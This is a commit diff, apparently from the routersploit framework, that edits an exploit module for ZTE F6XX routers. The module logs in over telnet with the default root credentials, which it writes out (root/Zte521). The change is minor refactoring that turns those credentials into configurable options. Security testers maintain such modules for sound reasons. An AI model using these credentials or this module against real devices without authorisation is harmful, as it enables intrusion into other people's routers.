Commit 5d98e2bf by devilscream

Fix exploits ZTE F6XX default root password

parent e3ff667c
...@@ -14,13 +14,12 @@ class Exploit(exploits.Exploit): ...@@ -14,13 +14,12 @@ class Exploit(exploits.Exploit):
""" """
__info__ = { __info__ = {
'name': 'ZTE F6XX Default root', 'name': 'ZTE F6XX Default root',
'description': 'Module exploits ZTE F6XX default root password. If the target is is possible to authentiate to the device.', 'description': 'Module exploits ZTE F6XX default root password. If the target is possible to authentiate to the device.',
'authors': [ 'authors': [
'devilscream', # vulnerability discovery 'devilscream' # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
], ],
'references': [ 'references': [
'', 'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html'
], ],
'devices': [ 'devices': [
'ZTE ZXA10 F660', 'ZTE ZXA10 F660',
...@@ -30,9 +29,8 @@ class Exploit(exploits.Exploit): ...@@ -30,9 +29,8 @@ class Exploit(exploits.Exploit):
} }
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
username = "root" password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
password = "Zte521"
def run(self): def run(self):
try: try:
...@@ -58,6 +56,7 @@ class Exploit(exploits.Exploit): ...@@ -58,6 +56,7 @@ class Exploit(exploits.Exploit):
print_error("Connection Error") print_error("Connection Error")
return return
@mute
def check(self): def check(self):
try: try:
tn = telnetlib.Telnet(self.target, 23) tn = telnetlib.Telnet(self.target, 23)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment